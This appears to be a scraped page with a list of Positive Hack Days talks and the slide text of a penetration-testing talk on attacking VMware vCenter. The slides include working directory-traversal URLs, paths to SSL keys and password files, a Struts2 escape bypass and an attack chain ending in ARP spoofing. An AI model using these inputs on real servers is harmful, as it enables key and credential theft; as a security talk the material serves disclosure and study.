Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

More from Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Recently uploaded

Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsAndrey Dotsenko
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsHyundai Motor Group
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraDeakin University
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxLBM Solutions
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfngoud9212
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 

Recently uploaded (20)

E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter RoadsSnow Chain-Integrated Tire for a Safe Drive on Winter Roads
Snow Chain-Integrated Tire for a Safe Drive on Winter Roads
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
 
The transition to renewables in India.pdf
The transition to renewables in India.pdfThe transition to renewables in India.pdf
The transition to renewables in India.pdf
 
Artificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning eraArtificial intelligence in the post-deep learning era
Artificial intelligence in the post-deep learning era
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Bluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdfBluetooth Controlled Car with Arduino.pdf
Bluetooth Controlled Car with Arduino.pdf
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 

How to hack VMware vCenter server in 60 seconds

  • 1. How to hack VMware vCenter server in 60 seconds Alexey Sintsov Alexander Minozhenko
  • 2. Hijacking VMware @asintsov @al3xmin • Pen-testers at Digital Security • Researchers • DCG#7812 / Zeronights • FUN, FUN, FUN © 2002—2012, Digital
  • 3. Hijacking VMware Our target © 2002—2012, Digital
  • 4. Hijacking VMware VMware vCenter Server • VMware vCenter Server is solution to manage VMware vSphere • vSphere – virtualization operating system © 2002—2012, Digital
  • 5. Hijacking VMware Pen-test… • Vmware vCenter version 4.1 update 1 Services: • Update Manager • vCenter Orchestrator • Chargeback • Other • Most of those services has web server © 2002—2012, Digital
  • 6. Hijacking VMware VASTO and CVE-2009-1523 • Directory traversal in Jetty web server http://target:9084/vci/download/health.xml/%3f/../../../../FILE • Discovered by Claudio Criscione • Fixed in VMware Update Manager 4.1 update 1 :( • Who want to pay me for 0day? • Pentester is not resercher? © 2002—2012, Digital
  • 8. Hijacking VMware CVE-2010-1870 • VMware vCenter Orchestrator use Struts2 version 2.11 discovered by Digital Defense, Inc • CVE-2010-1870 Struts2/XWork remote command execution discovered by Meder Kydyraliev Fixed in 4.2 © 2002—2012, Digital
  • 9. Hijacking VMware Details •Struts2 does not properly escape “#” •Could be bypass with unicode “u0023” •2 variables need to be set for RCE •#_memberAccess['allowStaticMethodAccess'] •#context['xwork.MethodAccessor.denyMethodExecution'] © 2002—2012, Digital
  • 10. Hijacking VMware But what about us? • Directory traversal in Jetty web server … AGAIN! http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..%5C..%5C.. %5C..FILE.EXT •Metasploit module vmware_update_manager_traversal.rb by sinn3r • We can read any file! But what Claudio Criscione propose to read vpxd-profiler-* - /SessionStats/SessionPool/Session/Id='06B90BCB-A0A4-4B9C-B680- FB72656A1DCB'/Username=„FakeDomainFakeUser'/SoapSession/Id='A Sorry, patched in 4.1! D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1 Contains logs of SOAP requests with session ID !!! Discovered by Alexey Sintsov 8) © 2002—2012, Digital
  • 11. Hijacking VMware Attack #1 • Read vpxd-profiler via traversal… • Get Admin’s IP addresses from it… • Read secret SSL key http://target:9084/vci/downloads/...............Documents and SettingsAll UsersApplication DataVMwareVMware VirtualCenterSSLrui.key • ARP-SPOOF with SSL key - PROFIT © 2002—2012, Digital
  • 12. Hijacking VMware VMware vCenter Orchestrator • Vmware vCO – software for automate configuration and management • Install by default with vCenter • Have interesting file C:Program filesVMwareInfrastructureOrchestratorconfigurationj ettyetcpasswd.properties © 2002—2012, Digital
  • 13. Hijacking VMware VMware vCenter Orchestrator Password disclosure Read hash -> crack MD5 -> log on into Orch. -> get vCenter pass © 2002—2012, Digital
  • 14. Hijacking VMware VMware vCenter Orchestrator – more stuff • vCO stored password at files: • C:Program FilesVMwareInfrastructureOrchestratorapp- <virtual-infrastructure-host serverservervmoconfpluginsVC.xml <enabled>true</enabled> • C:Program FilesVMwareInfrastructureOrchestratorapp- <url>https://new-virtual-center-host:443/sdk</url> <administrator-username>vmware</administrator-username> serverservervmoconfvmo.properties <administrator- password>010506275767b74786b383a4a60be767864740329d5fcf 324ec7fc98b1e0aaeef </administrator-password> <pattern>%u</pattern> </virtual-infrastructure-host> © 2002—2012, Digital
  • 15. Hijacking VMware Hmmm…. 006766e7964766a151e213a242665123568256c4031702d4c78454e5b575 f60654b vmware 00776646771786a783922145215445b62322d1a2b5d6e196a6a712d712e2 4726079 vcenter • Red bytes look like length • Green bytes in ASCII range • Black bytes random Discovered by Alexey Sintsov and Alexander Minozhenko © 2002—2012, Digital
  • 16. Hijacking VMware 0day still not patched 8) © 2002—2012, Digital
  • 17. Hijacking VMware gg and bb a.sintsov@dsec.ru @asintsov a.minozhenko@dsec.ru @al3xmin © 2002—2012, Digital